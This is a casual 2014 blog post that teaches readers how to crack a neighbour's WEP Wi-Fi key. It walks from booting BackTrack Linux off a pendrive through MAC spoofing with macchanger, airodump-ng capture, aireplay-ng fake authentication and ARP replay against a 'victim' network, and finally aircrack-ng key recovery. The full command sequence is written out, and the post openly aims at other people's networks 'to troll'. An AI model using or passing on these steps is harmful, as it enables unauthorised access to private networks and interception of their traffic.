
Friday, 26 September 2014

ok guys,
you might find loads of tutorials online on how to hack a WEP WIFI key …
i was able to do it this week , and i’ll make it as simple as possible for you :)
REQUIREMENTS <can be found on google>::::
step 1.
download or “borrow” BACKTRACK LINUX (.iso) <v5R2 being the latest > from
step 2.
download a small but highly useful tool called “unetbootin” .
it can be used to map the linux bootsector upon a pendrive.
step 3.
get a proper system<1G ram atleast><obviously with a wifi device or router>
and a pendrive<4G would be good enough>
get a little bit familiar with linux ;).
use unetbootin to write the .iso file to the pendrive.
to do that run unetbootin and click on iso image.
navigate to the BTR5R2<kde>.iso file, select and choose the pendrive drive letter and click ok.
this will take 5 minutes atleast.
step 3.
restart your system and boot from the pendrive.
to do that you need to press F2 or F12 or some other OEM specific key displayed during POST.
and remember all commands are terminated by CTRL+C.
and everything in <> means a value has to be inserted there.
step 1.
you should be getting a console.
you can do it from here also but to make it easier let’s go graphical.
type “startx” onto the terminal and enter.
KDE should load now.
step 2.
run terminal
now the main part begins.
first you have to look for your wifi device.
into the terminal and observe. note the name of the interface. mine was wlan0.
now type the following commands
airmon-ng stop <interface>
ifconfig <interface> down
macchanger –mac 11:11:11:11:11:11 <interface>
airmon-ng start <interface>
these 4 lines will first switch off your wifi device, mask the MAC address (which is kinda an IP but for HARDWARE identification) and start it up again.
step 4.
now we have to search for the wireless networks around to troll :P
airodump-ng <interface>
it will give you a list of networks along with details like encryption type , MAC address(bssid), signal strength(PWR,more -ive more better),channel no and the name.
note the above 4 values for the network you wanna hack.
now we capture packets.
airodump-ng -c <channel> -w <filename> –bssid <bssid> <interface>
filename can be anything you wish<it will take the dump>. other values taken from previous step.
but the data collected is really less <not enough to decrypt WEP> so we need a data rush.
dont terminate this process and open a new terminal.
this step will create a data rush b/w your and the victim’s wifi device.
aireplay-ng -1 0 -a <bssid> -h 11:11:11:11:11:11 -e <essid> <interface>
where essid is the network name.
 this will try to establish a connection with the victim device and allow streamlined flow of packets.
if you get a “success” message. then move on to the next step otherwise try again or choose a new wifi.
now type
aireplay-ng -3 -b <bssid> -h 11:11:11:11:11:11 <interface>
now switch to the terminal window of step6. wait for some time and you will see loads of packets being captured.keep it on for say 10 minutes till you have enough packets to brute.
now is the main part.
which takes not more than 10 min on an average <depends on your processor though>
to decrypt the key.
aircrack-ng -b <bssid> <filename>-01.cap
if the enough data was captured you should get a KEY FOUND message along with the key.
else it will say insufficient data. then you’ll have to do steps 6,7,8 again for a longer duration.
and USE WPA2-PSK for your own :P :P
plz comment if any queries :)



                                                                    Download Link




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